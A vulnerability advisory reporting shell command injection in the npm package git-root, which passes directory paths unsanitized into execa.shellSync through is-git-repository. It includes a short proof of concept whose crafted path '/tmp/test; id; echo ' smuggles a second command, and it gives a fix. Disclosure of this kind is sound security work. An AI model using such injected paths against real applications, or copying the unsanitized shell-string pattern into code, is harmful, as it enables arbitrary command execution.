Shell Command Injection via directory path #3

@gnsehfvlr

Shell Command Injection in git-root

Summary

git-root (<= 1.0.0) is vulnerable to Shell Command Injection via directory path input.

Description

The git-root package uses execa.shellSync() to check if a directory is a git repository. The directory path is directly interpolated into a shell command string without sanitization, allowing shell metacharacter injection.

Proof of Concept

const gitRoot = require('git-root');

// Crafted path with shell metacharacters
const malicious = "/tmp/test; id; echo ";

// This executes: sh -c "cd /tmp/test; id; echo  ; git rev-parse --git-dir"
// The 'id' command is executed as a separate shell command
try {
  gitRoot.sync(malicious);
} catch(e) {}

The vulnerability is in the dependency is-git-repository, which calls:

execa.shellSync("cd " + path + " ; git rev-parse --git-dir");
// path is NOT sanitized - shell metacharacters are interpreted

Impact

  • Remote Code Execution (RCE): Any application that passes user-controlled directory paths to git-root is vulnerable to arbitrary command execution.
  • Common in CLI tools, CI/CD pipelines, and monorepo management tools.

Remediation

Use execa.sync() instead of execa.shellSync() to avoid shell interpretation:

execa.sync('git', ['rev-parse', '--git-dir'], { cwd: path });

References
